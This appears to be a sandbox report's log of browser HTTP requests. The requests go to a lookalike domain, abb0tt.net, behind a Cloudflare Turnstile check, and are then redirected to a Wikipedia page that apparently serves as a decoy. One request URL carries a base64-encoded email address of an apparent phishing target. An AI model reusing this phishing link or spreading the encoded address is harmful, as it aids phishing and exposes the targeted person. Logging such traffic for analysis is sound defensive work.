"Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://abb0tt.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=aa7j8tvauvrfcetoopclfb3glv
Source: global trafficHTTP traffic detected: GET /?cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5QbATCVYrsb_TYhJ6CN4FeJpnY4t9SJtUz4gyX-ZRnNXe6ZO3DcmmMxgQHzQUxnjFttmEfaidYBN1A8kwyd6XIe60VCVTdTXBBIffeEmZQi3C_wZ5k5qElt05XgfvEJ8ttK_zXAth6pcu5FTiqbh9xoYE1O5ne5dHWDrGQ2qj5yzM34jJlPxb.NlHyrkBXsakvpHDE1QlTxQ.e18051cf1aaab27119e39aa8bed1a5d3144ccf7c212403d2850c191c1605bdf5&cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5QbATCVYrsb_TYhJ6CN4FeJpnY4t9SJtUz4gyX-ZRnNXe6ZO3DcmmMxgQHzQUxnjFttmEfaidYBN1A8kwyd6XIe60VCVTdTXBBIffeEmZQi3C_wZ5k5qElt05XgfvEJ8ttK_zXAth6pcu5FTiqbh9xoYE1O5ne5dHWDrGQ2qj5yzM34jJlPxb.NlHyrkBXsakvpHDE1QlTxQ.e18051cf1aaab27119e39aa8bed1a5d3144ccf7c212403d2850c191c1605bdf5 HTTP/1.1Host: abb0tt.netConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://abb0tt.net/?cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5Qb
Source: global trafficHTTP traffic detected: GET /oE8X9WywTktHJv7UszfC03GYzrl8oqZFRQJtR4IaS5hxhlRE6jLcAUFZNYekEs1X0dq1Tz3QFbpOuP5a8mL65fotnVc7WvrPHGqxxZNMDhiIHDuv7PiQgAKb4VSOcyogyLa92dTleCGsf0M2JUBwbM/index?a=c3VzYW4uYW5kcmV3c0BqZWZmcGFyaXNoLm5ldA%3D%3D HTTP/1.1Host: abb0tt.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://abb0tt.net/?cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5QbATCVYrsb_TYhJ6CN4FeJpnY4t9SJtUz4gyX-ZRnNXe6ZO3DcmmMxgQHzQUxnjFttmEfaidYBN1A8kwyd6XIe60VCVTdTXBBIffeEmZQi3C_wZ5k5qElt05XgfvEJ8ttK_zXAth6pcu5FTiqbh9xoYE1O5ne5dHWDrGQ2qj5yzM34jJlPxb.NlHyrkBXsakvpHDE1QlTxQ.e18051cf1aaab27119e39aa8bed1a5d3144ccf7c212403d2850c191c1605bdf5&cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5QbATCVYrsb_TYhJ6CN4FeJpnY4t9SJtUz4gyX-ZRnNXe6ZO3DcmmMxgQHzQUxnjFttmEfaidYBN1A8kwyd6XIe60VCVTdTXBBIffeEmZQi3C_wZ5k5qElt05XgfvEJ8ttK_zXAth6pcu5FTiqbh9xoYE1O5ne5dHWDrGQ2qj5yzM34jJlPxb.NlHyrkBXsakvpHDE1QlTxQ.e18051cf1aaab27119e39aa8bed1a5d3144ccf7c212403d2850c191c1605bdf5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=aa7j8tvauvrfcetoopclfb3glv
Source: global trafficHTTP traffic detected: GET /?https://en.wikipedia.org/wiki/Windows_Server_2019 HTTP/1.1Host: href.liConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://abb0tt.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wiki/Windows_Server_2019 HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022 HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://en.wikipedia.org/wiki/Windows_Server_2019Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /w/load.php?lang=en&modules=site.styles&only=styles&skin=vector-2022 HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://en.wikipedia.org/wiki/Windows_Server_2019Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /static/images/mobile/copyright/wikipedia-wordmark-en.svg HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/wiki/Windows_Server_2019Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /w/load.php?lang=en&modules=startup&only=scripts&raw=1&skin=vector-2022 HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://en.wikipedia.org/wiki/Windows_Server_2019Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /static/images/icons/wikipedia.png HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/wiki/Windows_Server_2019Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /wikipedia/commons/thumb/2/2f/Windows_Server_2019_logo_%28official%29.svg/200px-Windows_Server_2019_logo_%28official%29.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wikipedia/en/thumb/e/ed/Windows_Server_2019_desktop_screenshot.png/300px-Windows_Server_2019_desktop_screenshot.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wikipedia/commons/thumb/0/05/Windows_10_Logo.svg/200px-Windows_10_Logo.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wikipedia/en/thumb/d/db/Symbol_list_class.svg/16px-Symbol_list_class.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wikipedia/en/thumb/9/96/Symbol_category_class.svg/16px-Symbol_category_class.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/images/mobile/copyright/wikipedia-tagline-en.svg HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/wiki/Windows_Server_2019Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /w/load.php?modules=skins.vector.icons&image=menu&format=original&lang=en&skin=vector-2022&version=11c23 HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://en.wikipedia.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /w/load.php?modules=skins.vector.icons&image=ellipsis&format=original&lang=en&skin=vector-2022&version=11c23 HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://en.wikipedia.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /static/images/mobile/copyright/wikipedia-wordmark-en.svg HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /w/load.php?modules=skins.vector.icons&image=language&variant=progressive&format=original&lang=en&skin=vector-2022&version=11c23 HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://en.wikipedia.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /static/images/icons/wikipedia.png HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /w/skins/Vector/resources/skins.vector.styles/images/link-external-small-ltr-progressive.svg?fb64d HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global trafficHTTP traffic detected: GET /wikipedia/commons/thumb/0/05/Windows_10_Logo.svg/200px-Windows_10_Logo.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wikipedia/en/thumb/d/db/Symbol_list_class.svg/16px-Symbol_list_class.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
